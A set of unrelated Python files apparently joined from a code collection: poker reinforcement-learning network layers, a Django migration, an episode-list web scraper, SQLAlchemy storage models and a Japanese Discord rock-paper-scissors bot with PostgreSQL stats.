int_actions[actions_le_3] = actions[actions_le_3]
return int_actions,int_betsizes
@lru_cache(maxsize=30)
def unwrap_action(self,action:torch.Tensor,previous_action:torch.Tensor):
"""
Unwraps flat action into action_category and betsize_category
Action is from network outputs - 0-5
previous_action is from env. 1-6
"""
actions = torch.zeros(self.nA)
betsizes = torch.zeros(self.nB)
# actions[action[action < 3]] = 1
if action < NetworkActions.BET:
actions[action] = 1
elif previous_action == Action.UNOPENED or previous_action == Action.CHECK: # Unopened
actions[3] = 1
bet_category = action - 3
betsizes[bet_category] = 1
else: # facing bet or raise or call (preflop)
actions[4] = 1
bet_category = action - 3
betsizes[bet_category] = 1
int_actions = torch.argmax(actions, dim=0).unsqueeze(-1)
int_betsizes = torch.argmax(betsizes, dim=0).unsqueeze(-1)
return int_actions,int_betsizes
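    # Hedged example for unwrap_action (same assumed nA=5/nB=2 layout): a flat network
    # action of 4 facing Action.UNOPENED becomes action category 3 (bet) with betsize
    # category 1, while the same flat action facing a bet becomes category 4 (raise).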
# def unwrap_action(self,action:torch.Tensor,previous_action:torch.Tensor):
# """Unwraps flat action into action_category and betsize_category"""
# actions_output = torch.zeros(action.size(0),self.nA)
# betsizes = torch.zeros(action.size(0),self.nB)
# # actions[action[action < 3]] = 1
# # for i,action in enumerate(actions):
# if action < 3:
# actions_output[:,action] = 1
# elif previous_action == 5 or previous_action == 0: # Unopened
# actions_output[:,3] = 1
# bet_category = action - 3
# betsizes[:,bet_category] = 1
# else: # facing bet or raise
# actions_output[:,4] = 1
# bet_category = action - 3
# betsizes[:,bet_category] = 1
# int_actions = torch.argmax(actions_output, dim=-1)
# int_betsizes = torch.argmax(betsizes, dim=-1)
# return int_actions,int_betsizes
################################################
# Processing Layers #
################################################
class ProcessHandBoard(nn.Module):
def __init__(self,params,hand_length,hidden_dims=(16,32,32),output_dims=(15360,512,256,127),activation_fc=F.relu):
super().__init__()
self.output_dims = output_dims
self.activation_fc = activation_fc
self.hidden_dims = hidden_dims
self.hand_length = hand_length
self.one_hot_suits = torch.nn.functional.one_hot(torch.arange(0,SUITS.HIGH))
self.one_hot_ranks = torch.nn.functional.one_hot(torch.arange(0,RANKS.HIGH))
self.maxlen = params['maxlen']
self.device = params['device']
# Input is (b,4,2) -> (b,4,4) and (b,4,13)
self.suit_conv = nn.Sequential(
nn.Conv1d(5, 16, kernel_size=1, stride=1),
nn.BatchNorm1d(16),
nn.ReLU(inplace=True),
)
self.rank_conv = nn.Sequential(
nn.Conv1d(5, 16, kernel_size=5, stride=1),
nn.BatchNorm1d(16),
nn.ReLU(inplace=True),
)
self.hidden_layers = nn.ModuleList()
for i in range(len(self.hidden_dims)-1):
self.hidden_layers.append(nn.Linear(self.hidden_dims[i],self.hidden_dims[i+1]))
self.categorical_output = nn.Linear(512,7463)
self.output_layers = nn.ModuleList()
for i in range(len(self.output_dims)-1):
self.output_layers.append(nn.Linear(self.output_dims[i],self.output_dims[i+1]))
# self.hand_out = nn.Linear(128,256) #params['lstm_in'] // 3)
def set_device(self,device):
self.device = device
def forward(self,x):
"""
x: concatenated hand and board. alternating rank and suit.
shape: B,M,18
"""
B,M,C = x.size()
ranks,suits = unspool(x)
# Shape of B,M,60,5
hot_ranks = self.one_hot_ranks[ranks].float().to(self.device)
hot_suits = self.one_hot_suits[suits].float().to(self.device)
# hot_ranks torch.Size([1, 2, 60, 5, 15])
# hot_suits torch.Size([1, 2, 60, 5, 5])
# torch.set_printoptions(threshold=7500)
raw_activations = []
activations = []
for i in range(B):
raw_combinations = []
combinations = []
for j in range(M):
s = self.suit_conv(hot_suits[i,j,:,:,:])
r = self.rank_conv(hot_ranks[i,j,:,:,:])
out = torch.cat((r,s),dim=-1)
raw_combinations.append(out)
# out: (b,64,16)
for hidden_layer in self.hidden_layers:
out = self.activation_fc(hidden_layer(out))
out = self.categorical_output(out.view(60,-1))
combinations.append(torch.argmax(out,dim=-1))
activations.append(torch.stack(combinations))
raw_activations.append(torch.stack(raw_combinations))
# baseline = hardcode_handstrength(x)
results = torch.stack(activations)
best_hand = torch.min(results,dim=-1)[0].unsqueeze(-1)
# print(best_hand)
# print(baseline)
raw_results = torch.stack(raw_activations).view(B,M,-1)
# (B,M,60,7463)
for output_layer in self.output_layers:
raw_results = self.activation_fc(output_layer(raw_results))
# (B,M,60,512)
# o = self.hand_out(raw_results.view(B,M,-1))
return torch.cat((raw_results,best_hand.float()),dim=-1)
class ProcessOrdinal(nn.Module):
def __init__(self,critic,params,activation_fc=F.relu):
super().__init__()
self.activation_fc = activation_fc
self.critic = critic
self.device = params['device']
self.street_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=Street.RIVER+1,padding_idx=0)
self.action_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=Action.UNOPENED+1,padding_idx=0)
self.position_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=4,padding_idx=0)
self.actor_indicies = {
'hero_pos':0,
'street':2,
'last_action_pos':4,
'prev_action':5
}
self.critic_indicies = {
'hero_pos':0,
'street':1,
'last_action_pos':5,
'prev_action':6
}
if critic:
self.indicies = self.critic_indicies
else:
self.indicies = self.actor_indicies
def forward(self,x):
hero_position = self.street_emb(x[:,:,self.indicies['hero_pos']].long())
street = self.street_emb(x[:,:,self.indicies['street']].long())
previous_action = self.action_emb(x[:,:,self.indicies['prev_action']].long())
last_action_position = self.position_emb(x[:,:,self.indicies['last_action_pos']].long())
return torch.cat((street,hero_position,previous_action,last_action_position),dim=-1)
class ProcessContinuous(nn.Module):
def __init__(self,critic,params,activation_fc=F.relu):
super().__init__()
self.activation_fc = activation_fc
self.stack_fc = nn.Linear(1,params['embedding_size']//4)
self.call_fc = nn.Linear(1,params['embedding_size']//4)
self.odds_fc = nn.Linear(1,params['embedding_size']//4)
self.pot_fc = nn.Linear(1,params['embedding_size']//4)
self.critic_indicies = {
'hero_stack':0,
'pot':3,
'amnt_to_call':4,
'pot_odds':5
}
self.actor_indicies = {
'hero_stack':0,
'pot':4,
'amnt_to_call':5,
'pot_odds':6
}
if critic:
self.indicies = self.critic_indicies
else:
self.indicies = self.actor_indicies
def forward(self,x):
B,M,C = x.size()
hero_stack = x[:,:,self.indicies['hero_stack']]
amnt_to_call = x[:,:,self.indicies['amnt_to_call']]
pot_odds = x[:,:,self.indicies['pot_odds']]
pot = x[:,:,self.indicies['pot']]
stack = []
calls = []
odds = []
        pots = []
for i in range(B):
for j in range(M):
stack.append(self.activation_fc(self.stack_fc(hero_stack[i,j].unsqueeze(-1))))
calls.append(self.activation_fc(self.call_fc(amnt_to_call[i,j].unsqueeze(-1))))
odds.append(self.activation_fc(self.odds_fc(pot_odds[i,j].unsqueeze(-1))))
                pots.append(self.activation_fc(self.pot_fc(pot[i,j].unsqueeze(-1))))
        emb_pot = torch.stack(pots).view(B,M,-1)
emb_call = torch.stack(calls).view(B,M,-1)
emb_stack = torch.stack(stack).view(B,M,-1)
emb_odds = torch.stack(odds).view(B,M,-1)
if emb_pot.dim() == 2:
emb_pot = emb_pot.unsqueeze(0)
emb_call = emb_call.unsqueeze(0)
emb_stack = emb_stack.unsqueeze(0)
emb_odds = emb_odds.unsqueeze(0)
return torch.stack((emb_pot,emb_call,emb_stack,emb_odds),dim=-1).view(B,M,-1)
class PreProcessLayer(nn.Module):
def __init__(self,params,critic=False):
super().__init__()
self.critic = critic
self.maxlen = params['maxlen']
self.state_mapping = params['state_mapping']
self.obs_mapping = params['obs_mapping']
self.device = params['device']
hand_length = Globals.HAND_LENGTH_DICT[params['game']]
self.hand_board = ProcessHandBoard(params,hand_length)
self.continuous = ProcessContinuous(critic,params)
self.ordinal = ProcessOrdinal(critic,params)
def set_device(self,device):
self.device = device
self.hand_board.set_device(device)
def forward(self,x):
B,M,C = x.size()
if self.critic:
h1 = self.hand_board(x[:,:,self.obs_mapping['hand_board']].float())
h2 = self.hand_board(x[:,:,self.obs_mapping['villain_board']].float())
h = h1 - h2
o = self.ordinal(x[:,:,self.obs_mapping['ordinal']].to(self.device))
c = self.continuous(x[:,:,self.obs_mapping['continuous']].to(self.device))
else:
h = self.hand_board(x[:,:,self.state_mapping['hand_board']].float())
o = self.ordinal(x[:,:,self.state_mapping['ordinal']].to(self.device))
c = self.continuous(x[:,:,self.state_mapping['continuous']].to(self.device))
combined = torch.cat((h,o,c),dim=-1)
return combined
################################################
# Helper Layers #
################################################
class GaussianNoise(nn.Module):
"""Gaussian noise regularizer.
Args:
sigma (float, optional): relative standard deviation used to generate the
noise. Relative means that it will be multiplied by the magnitude of
        the value you are adding the noise to. This means that sigma can be
the same regardless of the scale of the vector.
is_relative_detach (bool, optional): whether to detach the variable before
computing the scale of the noise. If `False` then the scale of the noise
won't be seen as a constant but something to optimize: this will bias the
network to generate vectors with smaller values.
"""
def __init__(self,device='cpu', sigma=0.1, is_relative_detach=True):
super().__init__()
self.sigma = sigma
self.is_relative_detach = is_relative_detach
self.noise = torch.tensor(0).float().to(device)
def set_device(self,device):
self.noise = self.noise.to(device)
def forward(self, x):
if self.training and self.sigma != 0:
#x = x.cpu()
scale = self.sigma * x.detach() if self.is_relative_detach else self.sigma * x
sampled_noise = self.noise.repeat(*x.size()).normal_() * scale
x = x + sampled_noise
return x#.cuda()
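# Hedged usage sketch (layer sizes are illustrative, not from the original code):
#
#   noisy_mlp = nn.Sequential(
#       GaussianNoise(sigma=0.05),   # perturbs inputs only while the module is in training mode
#       nn.Linear(128, 64),
#       nn.ReLU(),
#   )
#
# In eval() mode, or with sigma=0, the layer is an identity, as forward() above shows.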
class EncoderAttention(nn.Module):
def __init__(self,in_size,lstm_out):
super().__init__()
self.context_nn = nn.Linear(lstm_out,in_size)
def forward(self,x,hidden_states):
context = self.context_nn(hidden_states)
scores = F.softmax(context,dim=-1)
return scores * x
class VectorAttention(nn.Module):
def __init__(self,in_size):
super().__init__()
self.context_nn = nn.Linear(in_size,in_size)
def forward(self,x):
context = self.context_nn(x)
scores = F.softmax(context,dim=-1)
return scores * x
class Embedder(nn.Module):
def __init__(self,vocab_size,d_model):
super().__init__()
self.embed = nn.Embedding(vocab_size,d_model)
def forward(self,x):
return self.embed(x)
class positionalEncoder(nn.Module):
def __init__(self,d_model, max_seq_len = 80):
super().__init__()
self.d_model = d_model
        pe = torch.zeros(max_seq_len,d_model)
        for pos in range(max_seq_len):
            for i in range(0,d_model,2):
                pe[pos,i] = math.sin(pos / (10000 ** ((2*i)/d_model)))
                pe[pos,i+1] = math.cos(pos / (10000 ** ((2*(i+1))/d_model)))
        pe = pe.unsqueeze(0)
self.register_buffer('pe',pe)
def forward(self,x):
x = x * math.sqrt(self.d_model)
seq_len = x.size(1)
        x = x + self.pe[:,:seq_len]
return x
class SelfAttentionWide(nn.Module):
def __init__(self, emb, heads=8, mask=False):
"""
:param emb:
:param heads:
:param mask:
"""
super().__init__()
self.emb = emb
self.heads = heads
self.mask = mask
self.tokeys = nn.Linear(emb, emb * heads, bias=False)
self.toqueries = nn.Linear(emb, emb * heads, bias=False)
self.tovalues = nn.Linear(emb, emb * heads, bias=False)
self.unifyheads = nn.Linear(heads * emb, emb)
def forward(self, x):
b, t, e = x.size()
h = self.heads
assert e == self.emb, f'Input embedding dim ({e}) should match layer embedding dim ({self.emb})'
keys = self.tokeys(x) .view(b, t, h, e)
queries = self.toqueries(x).view(b, t, h, e)
values = self.tovalues(x) .view(b, t, h, e)
# compute scaled dot-product self-attention
# - fold heads into the batch dimension
keys = keys.transpose(1, 2).contiguous().view(b * h, t, e)
queries = queries.transpose(1, 2).contiguous().view(b * h, t, e)
values = values.transpose(1, 2).contiguous().view(b * h, t, e)
queries = queries / (e ** (1/4))
keys = keys / (e ** (1/4))
# - Instead of dividing the dot products by sqrt(e), we scale the keys and values.
# This should be more memory efficient
# - get dot product of queries and keys, and scale
dot = torch.bmm(queries, keys.transpose(1, 2))
assert dot.size() == (b*h, t, t)
if self.mask: # mask out the upper half of the dot matrix, excluding the diagonal
mask_(dot, maskval=float('-inf'), mask_diagonal=False)
dot = F.softmax(dot, dim=2)
# - dot now has row-wise self-attention probabilities
# apply the self attention to the values
out = torch.bmm(dot, values).view(b, h, t, e)
# swap h, t back, unify heads
out = out.transpose(1, 2).contiguous().view(b, t, h * e)
return self.unifyheads(out)
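# Hedged shape note (illustration only): for x of shape (batch, tokens, emb) the wide
# attention above returns the same (batch, tokens, emb) shape; every head keeps the full
# embedding width, so its memory cost scales with heads * emb rather than emb.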
class SelfAttentionNarrow(nn.Module):
def __init__(self, emb, heads=8, mask=False):
"""
:param emb:
:param heads:
:param mask:
"""
super().__init__()
assert emb % heads == 0, f'Embedding dimension ({emb}) should be divisible by nr. of heads ({heads})'
self.emb = emb
self.heads = heads
self.mask = mask
s = emb // heads
# - We will break the embedding into `heads` chunks and feed each to a different attention head
self.tokeys = nn.Linear(s, s, bias=False)
self.toqueries = nn.Linear(s, s, bias=False)
self.tovalues = nn.Linear(s, s, bias=False)
self.unifyheads = nn.Linear(heads * s, emb)
def forward(self, x):
b, t, e = x.size()
h = self.heads
assert e == self.emb, f'Input embedding dim ({e}) should match layer embedding dim ({self.emb})'
s = e // h
x = x.view(b, t, h, s)
keys = self.tokeys(x)
queries = self.toqueries(x)
values = self.tovalues(x)
assert keys.size() == (b, t, h, s)
assert queries.size() == (b, t, h, s)
assert values.size() == (b, t, h, s)
# Compute scaled dot-product self-attention
# - fold heads into the batch dimension
keys = keys.transpose(1, 2).contiguous().view(b * h, t, s)
queries = queries.transpose(1, 2).contiguous().view(b * h, t, s)
values = values.transpose(1, 2).contiguous().view(b * h, t, s)
queries = queries / (e ** (1/4))
keys = keys / (e ** (1/4))
# - Instead of dividing the dot products by sqrt(e), we scale the keys and values.
# This should be more memory efficient
# - get dot product of queries and keys, and scale
dot = torch.bmm(queries, keys.transpose(1, 2))
assert dot.size() == (b*h, t, t)
if self.mask: # mask out the upper half of the dot matrix, excluding the diagonal
mask_(dot, maskval=float('-inf'), mask_diagonal=False)
dot = F.softmax(dot, dim=2)
# - dot now has row-wise self-attention probabilities
# apply the self attention to the values
out = torch.bmm(dot, values).view(b, h, t, s)
# swap h, t back, unify heads
out = out.transpose(1, 2).contiguous().view(b, t, s * h)
return self.unifyheads(out)
class TransformerBlock(nn.Module):
def __init__(self, emb, heads, mask, seq_length, ff_hidden_mult=4, dropout=0.0, wide=True):
super().__init__()
self.attention = SelfAttentionWide(emb, heads=heads, mask=mask) if wide \
else SelfAttentionNarrow(emb, heads=heads, mask=mask)
self.mask = mask
self.norm1 = nn.LayerNorm(emb)
self.norm2 = nn.LayerNorm(emb)
self.ff = nn.Sequential(
nn.Linear(emb, ff_hidden_mult * emb),
nn.ReLU(),
nn.Linear(ff_hidden_mult * emb, emb)
)
self.do = nn.Dropout(dropout)
def forward(self, x):
attended = self.attention(x)
x = self.norm1(attended + x)
x = self.do(x)
fedforward = self.ff(x)
x = self.norm2(fedforward + x)
x = self.do(x)
return x
class CTransformer(nn.Module):
"""
Transformer for classifying sequences
"""
def __init__(self, emb, heads, depth, seq_length, num_classes, max_pool=True, dropout=0.0, wide=False):
"""
:param emb: Embedding dimension
:param heads: nr. of attention heads
:param depth: Number of transformer blocks
:param seq_length: Expected maximum sequence length
:param num_tokens: Number of tokens (usually words) in the vocabulary
:param num_classes: Number of classes.
:param max_pool: If true, use global max pooling in the last layer. If false, use global
average pooling.
"""
super().__init__()
self.max_pool = max_pool
# self.token_embedding = nn.Embedding(embedding_dim=emb, num_embeddings=num_tokens)
# self.pos_embedding = nn.Embedding(embedding_dim=emb, num_embeddings=seq_length)
tblocks = []
for i in range(depth):
tblocks.append(
TransformerBlock(emb=emb, heads=heads, seq_length=seq_length, mask=False, dropout=dropout, wide=wide))
self.tblocks = nn.Sequential(*tblocks)
self.toprobs = nn.Linear(emb, num_classes)
self.do = nn.Dropout(dropout)
def forward(self, x):
"""
        :param x: A (batch, seq_length, emb) tensor of already-embedded tokens
                  (the token/position embeddings below are commented out).
        :return: class score vectors, one per sequence in the batch.
"""
# tokens = self.token_embedding(x)
# b, t, e = tokens.size()
# positions = self.pos_embedding(torch.arange(t, device=d()))[None, :, :].expand(b, t, e)
# x = tokens + positions
x = self.do(x)
x = self.tblocks(x)
x = x.max(dim=1)[0] if self.max_pool else x.mean(dim=1) # pool over the time dimension
x = self.toprobs(x)
return x #F.log_softmax(x, dim=1)
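# --- Hedged usage sketch (all sizes below are made up for illustration) -----------------
#   model = CTransformer(emb=64, heads=4, depth=2, seq_length=80, num_classes=3)
#   x = torch.randn(8, 80, 64)   # already-embedded sequences: (batch, seq, emb)
#   logits = model(x)            # -> (8, 3) class scores; softmax is left to the caller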
|
from ups import UPSConnection, UPSError, SHIPPING_SERVICES
|
# Generated by Django 3.2.7 on 2021-09-13 17:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0004_alter_recipe_slug'),
]
operations = [
migrations.RenameField(
model_name='recipe',
old_name='category',
new_name='categories',
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import time
from typing import Dict, List
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import requests
def get_season_by_series() -> Dict[str, List[str]]:
url = 'http://rik-i-morti.ru/'
s = requests.session()
rs = s.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
season_by_series = dict()
for cell in root.select_one('.alltable').select('.cell'):
title = cell.p.get_text(strip=True)
season_url = urljoin(rs.url, cell.a['href'])
rs_season = s.get(season_url)
root = BeautifulSoup(rs_season.content, 'html.parser')
season_by_series[title] = [
x.get_text(strip=True) for x in root.select('#dle-content > .short-item h3')
]
        # Don't hammer the site with requests
time.sleep(1)
return season_by_series
if __name__ == '__main__':
season_by_series = get_season_by_series()
print('Total seasons:', len(season_by_series))
print('Total episodes:', sum(map(len, season_by_series.values())))
# Total seasons: 4
# Total episodes: 41
print(season_by_series)
# {'Сезон 1': ['1 сезон 1 серия: Пилотный эпизод', '1 сезон 2 серия: Пёс-газонокосильщик', '1 сезон 3 серия: Анатомический парк', '1 сезон 4 серия: М. Найт Шьямал-Инопланетяне!', '1 сезон 5 серия: Мисикс и разрушение', '1 сезон 6 серия: Вакцина Рика #9', '1 сезон 7 серия: Взрослеющий газорпазорп', '1 сезон 8 серия: Рикдцать минут', '1 сезон 9 серия: Надвигается нечто риканутое', '1 сезон 10 серия: Поймать рикоразновидности рода Рика', '1 сезон 11 серия: Риксованное дело'], 'Сезон 2': ['2 сезон 1 серия: Рик во времени', '2 сезон 2 серия: Успеть до Мортиночи', '2 сезон 3 серия: Аутоэротическая ассимиляция', '2 сезон 4 серия: Вспомрикнуть всё', '2 сезон 5 серия: Пора швифтануться', '2 сезон 6 серия: Рики, наверное, сошли с ума', '2 сезон 7 серия: Большой переполох в маленьком Санчезе', '2 сезон 8 серия: Межпространственный кабель 2: Искушение судьбы', '2 сезон 9 серия: Посмотрите кто сейчас зачищает', '2 сезон 10 серия: Свадебные сквончеры'], 'Сезон 3': ['3 сезон 1 серия: Побег из Рикшенка', '3 сезон 2 серия: Рикман с камнем', '3 сезон 3 серия: Огурчик Рик', '3 сезон 4 серия: Заступники 3: Возвращение Губителя Миров', '3 сезон 5 серия: Запутанный грязный заговор', '3 сезон 6 серия: Отдых и Риклаксация', '3 сезон 7 серия: Риклантидическая путаница', '3 сезон 8 серия: Проветренный мозг Морти', '3 сезон 9 серия: Азбука Бет', '3 сезон 10 серия: Рикчжурский Мортидат'], 'Сезон 4': ['4 сезон 1 серия: Грань мортущего: Рикви́. Умри. И рикнова', '4 сезон 2 серия: Старик и сиденье', '4 сезон 3 серия: Командуя над гнездом рикушки', '4 сезон 4 серия: Закоготь и подрядок - Специальный Рикпус', '4 сезон 5 серия: Рикный рикейсер Рикактика', '4 сезон 6 серия: БесРиконечный Морти', '4 сезон 7 серия: Промортей', '4 сезон 8 серия: Эпизод с чаном кислоты', '4 сезон 9 серия: Рикя Мортивеческое', '4 сезон 10 серия: Звёздные Морти: Рикращение Джерраев']}
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for Dolphin data.
"""
import json
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_db.sqlalchemy.types import JsonEncodedDict
from sqlalchemy import Column, Integer, String, Numeric
from sqlalchemy.ext.declarative import declarative_base
CONF = cfg.CONF
BASE = declarative_base()
class DolphinBase(models.ModelBase,
models.TimestampMixin):
"""Base class for Dolphin Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
metadata = None
class RegistryContext(BASE, DolphinBase):
"""Represent registration parameters required for storage object."""
__tablename__ = "registry_contexts"
storage_id = Column(String(36), primary_key=True)
hostname = Column(String(36), default='False')
username = Column(String(255))
password = Column(String(255))
vendor = Column(String(255))
model = Column(String(255))
extra_attributes = Column(JsonEncodedDict)
class Storage(BASE, DolphinBase):
"""Represents a storage object."""
__tablename__ = 'storages'
id = Column(String(36), primary_key=True)
name = Column(String(255))
vendor = Column(String(255))
description = Column(String(255))
model = Column(String(255))
status = Column(String(255))
serial_number = Column(String(255))
location = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
class Volume(BASE, DolphinBase):
"""Represents a volume object."""
__tablename__ = 'volumes'
id = Column(Integer, primary_key=True)
name = Column(String(255))
storage_id = Column(String(255))
pool_id = Column(String(255))
description = Column(String(255))
status = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
class Pool(BASE, DolphinBase):
"""Represents a pool object."""
__tablename__ = 'pools'
id = Column(Integer, primary_key=True)
name = Column(String(255))
storage_id = Column(String(255))
description = Column(String(255))
status = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
|
import discord
import env
import textwrap
import random
import datetime
import os
import psycopg2
from psycopg2.extras import DictCursor
def get_connection():
dsn = env.DATABASE_URL
return psycopg2.connect(dsn, sslmode='require')
def key_parser(message, keyword_list):
    """Return True if any keyword in keyword_list appears in the message content."""
    has_keyword = False
    for key in keyword_list:
        if key in message.content:
            has_keyword = True
            break
    return has_keyword
class GameRPS:
__rps_done_member_list = []
__msg_daily_limit_exceeded = textwrap.dedent("""\
じゃんけんは1日1回まで!
ほな、また明日!
""")
__msg_too_many_hands = textwrap.dedent("""\
手を複数同時に出すのは反則やで!
""")
__msg_win = textwrap.dedent("""\
やるやん。
明日は俺にリベンジさせて。
では、どうぞ。
""")
__msg_lose_r = textwrap.dedent("""\
俺の勝ち!
負けは次につながるチャンスです!
ネバーギブアップ!
ほな、いただきます!
""")
__msg_lose_s = textwrap.dedent("""\
俺の勝ち!
たかがじゃんけん、そう思ってないですか?
それやったら明日も、俺が勝ちますよ
ほな、いただきます!
""")
__msg_lose_p = textwrap.dedent("""\
俺の勝ち!
なんで負けたか、明日まで考えといてください。
そしたら何かが見えてくるはずです
ほな、いただきます!
""")
__filenames_win = [
"honda_win.png"
]
__filenames_lose_r = [
# "honda_p.png",
"honda_p.gif"
]
__filenames_lose_s = [
# "honda_r.png",
"honda_r.gif"
]
__filenames_lose_p = [
# "honda_s.png",
"honda_s.gif"
]
__youtube_lose_r = "https://youtu.be/LhPJcvJLNEA"
__youtube_lose_s = "https://youtu.be/SWNCYpeDTfo"
__youtube_lose_p = "https://youtu.be/28d78XP1TJs"
def __init__(self):
pass
def __parse_hands(self, message):
r = key_parser(message, env.HAND_R_KEYWORDS)
p = key_parser(message, env.HAND_P_KEYWORDS)
s = key_parser(message, env.HAND_S_KEYWORDS)
return [r, p, s]
def __check_player_rights(self, player):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT * FROM honda_bot_users')
rows = cur.fetchall()
player_id = player.id
player_name = player.name
dt_now, dt_prev_refresh, dt_next_refresh = env.get_dt_now_and_dt_prev_next_refresh()
for row in rows:
if row["id"] == player_id:
dt_last_accessed = row["last_accessed"]
if dt_last_accessed == None or dt_last_accessed < dt_prev_refresh:
return True, None, None
else:
return False, dt_last_accessed, dt_next_refresh
cur.execute('INSERT INTO honda_bot_users (id, name, battle_count_total, battle_count_win, battle_count_lose) VALUES (%s, %s, %s, %s, %s)', (player_id, player_name, 0, 0, 0))
return True, None, None
def __update_player_access_and_battle_count(self, player, result):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
player_id = player.id
dt_now = datetime.datetime.now()
cur.execute('UPDATE honda_bot_users SET last_accessed = %s WHERE id = %s', (dt_now, player_id))
cur.execute('UPDATE honda_bot_users SET battle_count_total = battle_count_total + 1 WHERE id = %s', (player_id,))
if result == 'W':
cur.execute('UPDATE honda_bot_users SET battle_count_win = battle_count_win + 1 WHERE id = %s', (player_id,))
elif result == 'L':
cur.execute('UPDATE honda_bot_users SET battle_count_lose = battle_count_lose + 1 WHERE id = %s', (player_id,))
async def __play_youtube(self, voice, url):
player = await voice.create_ytdl_player(url)
player.start()
def __create_rps_battle_string(self, player, hands, result='L'): # result: win->'W' lose->'L'
player_hand = None
honda_hand = None
r, p, s = hands
if result == 'W':
if r is True:
player_hand = env.EMOJI_R
honda_hand = env.EMOJI_S
elif s is True:
player_hand = env.EMOJI_S
honda_hand = env.EMOJI_P
elif p is True:
player_hand = env.EMOJI_P
honda_hand = env.EMOJI_R
elif result == 'L':
if r is True:
player_hand = env.EMOJI_R
honda_hand = env.EMOJI_P
elif s is True:
player_hand = env.EMOJI_S
honda_hand = env.EMOJI_R
elif p is True:
player_hand = env.EMOJI_P
honda_hand = env.EMOJI_S
if player_hand is not None and honda_hand is not None:
return "(YOU) " + player_hand + " VS " + honda_hand + " (HONDA)\n"
else:
return ""
async def __play_rps(self, ch, player, hands, m_prefix=""):
r, p, s = hands
rnd = random.random()
if rnd < env.WIN_RATE:
battle_result = 'W'
else:
battle_result = 'L'
m_prefix = m_prefix + self.__create_rps_battle_string(player, hands, battle_result)
if battle_result == 'W':
f = [discord.File(filename) for filename in self.__filenames_win]
m = self.__msg_win
elif battle_result == 'L':
if r is True:
f = [discord.File(filename) for filename in self.__filenames_lose_r]
m = self.__msg_lose_r
elif s is True:
f = [discord.File(filename) for filename in self.__filenames_lose_s]
m = self.__msg_lose_s
elif p is True:
f = [discord.File(filename) for filename in self.__filenames_lose_p]
m = self.__msg_lose_p
self.__update_player_access_and_battle_count(player, battle_result) # update user's last access time when rps is done
await ch.send(m_prefix + m, files=f)
return
async def process_message(self, client, message):
player = message.author
hands = self.__parse_hands(message)
ch = message.channel
if hands.count(True) == 0:
return
m_prefix = player.mention + "\n"
# judge rights
        player_rights, dt_last_accessed, dt_next_refresh = self.__check_player_rights(player)
if player_rights is False:
m = self.__msg_daily_limit_exceeded
await ch.send(m_prefix + m)
return
if hands.count(True) > 1:
m = self.__msg_too_many_hands
await ch.send(m_prefix + m)
else:
assert hands.count(True) == 1, 'assert: [r, p, s].count(True) == 1 ... r:{0}, p:{1}, s:{2}'.format(hands[0], hands[1], hands[2])
await self.__play_rps(ch, player, hands, m_prefix)
def get_player_stats(player):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
player_id = player.id
cur.execute('SELECT * FROM honda_bot_users WHERE id = %s', (player_id,))
row = cur.fetchone()
if row is None:
return False, "Player Name Undefined", -1, -1, -1
else:
player_name = row["name"]
return True, player_name, row["battle_count_total"], row["battle_count_win"], row["battle_count_lose"]
def get_player_stats_from_id_given(player_id):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT * FROM honda_bot_users WHERE id = %s', (player_id,))
row = cur.fetchone()
if row is None:
return False, "Player Name Undefined", -1, -1, -1
else:
player_name = row["name"]
return True, player_name, row["battle_count_total"], row["battle_count_win"], row["battle_count_lose"]
def get_player_ids():
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT id FROM honda_bot_users')
rows = cur.fetchall()
player_ids = []
for row in rows:
player_ids.append(row["id"])
return player_ids
async def respond_stats(message):
if message.content.startswith("!stats"):
player = message.author
found, player_name, ttl, win, lose = get_player_stats(player)
if found is True:
m = textwrap.dedent(f"""\
{player.name}さんの戦績:
{win}勝{lose}敗 => 勝率 {(win/ttl):.2%}
""")
await message.channel.send(m)
else:
m = textwrap.dedent(f"""\
{player.name}さんのデータは存在しないみたいやで!
一回じゃんけんしてみようや!
""")
await message.channel.send(m)
async def respond_allstats(message):
if message.content.startswith("!allstats"):
player_ids = get_player_ids()
all_stats = []
for player_id in player_ids:
found, player_name, ttl, win, lose = get_player_stats_from_id_given(player_id)
if found is True:
win_rate = win/ttl
all_stats.append( (player_name, ttl, win, lose, win_rate) )
if all_stats:
all_stats.sort(key=lambda x: x[4], reverse=True)
string_list = []
for player_name, ttl, win, lose, win_rate in all_stats:
string_list.append(f"{player_name}さん:{win}勝{lose}敗 => 勝率 {(win/ttl):.2%}")
m = "\n".join(string_list)
await message.channel.send(m)
else:
m = textwrap.dedent(f"""\
誰のデータも存在しないみたいやで!
みんなじゃんけんしてみようや!
""")
await message.channel.send(m)
|
